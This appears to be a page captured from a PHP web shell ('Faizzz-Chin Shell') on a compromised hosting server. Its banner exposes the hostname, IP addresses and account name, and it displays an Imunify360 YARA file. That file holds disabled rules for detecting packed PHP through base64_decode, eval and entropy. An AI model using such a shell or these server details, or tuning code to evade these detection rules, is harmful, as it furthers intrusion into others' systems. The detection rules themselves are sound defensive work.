
Faizzz-Chin Shell

: /var/imunify360/files/sigs/v1/heuristic/ [ drwxrwxr-x ]
Uname\Kernel: Linux server.kxo.bgz.mybluehostin.me 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Server: Apache
PHP Version: 8.2.29 [ PHP INFO ]
Operating System: Linux
Server Ip: 162.240.163.222
Your Ip: 216.73.216.145
Date Time: 2025-07-12 08:56:43
User: dilseshaadi (1027) | Group: dilseshaadi (1027)
Safe Mode: OFF
Disable Function: exec,passthru,shell_exec,system

name : main.yara
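// main.yara: top-level file of this heuristic signature directory.
// The include below is the only active statement here. Every rule defined in
// this file sits inside the block comment that follows and is therefore
// disabled.

// import "math"   (left disabled; only the disabled rules below use math functions)
include "webshells.yara"

/*
DISABLED HEURISTIC RULES, kept for reference only.

Before re-enabling any of them:
  - restore the `import "math"` line above: php_keywords_rate and php_packed
    call math.divide and math.entropy;
  - NOTE(review): math.divide does not appear to be part of the stock YARA
    math module; confirm that the engine loading this file provides it;
  - size_limit is declared global, so once active it would gate every rule in
    the same namespace, not only the rules written in this file.

// Global gate: only files smaller than 1MB are evaluated.
private  global rule size_limit
{
    condition:
        filesize < 1MB
        
}

// Helper: file is under 1MB and contains a PHP open tag, either "<?php" or
// "<?" followed by whitespace.
// NOTE(review): the pattern is case-sensitive and does not cover the "<?="
// form; consider `nocase` and the extra alternative if this is re-enabled.
private rule is_php
{
    strings:
        $str = /<\?(php|\s)/

    condition:
        (filesize < 1MB) and $str
}

// Helper: PHP file in which the listed common keywords occur more than once
// per 1000 bytes of file size. php_packed negates this rule.
private rule php_keywords_rate {
    strings:
        $keyword = /\b(this|if|return|function|else|array|false|true)\b/
        
    condition:
        is_php and math.divide(#keyword, filesize) > 0.001
}

// Flags a PHP file that has (base64_decode( together with eval( ) or a
// variable-function call, whole-file entropy of at least 5.00, and a keyword
// rate at or below the php_keywords_rate threshold.
// $func3 matches any `$name(` call and is broad on its own; the entropy and
// keyword-rate terms are what narrow the match.
// NOTE(review): the trailing 5.81 is presumably an earlier or alternative
// entropy threshold; confirm before changing the 5.00 value.
rule php_packed
{
    strings:
        $func1 = /base64_decode\s*\(/
        $func2 = /eval\s*\(/
        $func3 = /\$[a-zA-Z0-9_]+\(/
        
    condition:
        is_php and (($func1 and $func2) or $func3) and (math.entropy(0, filesize) >= 5.00)  and not php_keywords_rate //5.81
}
*/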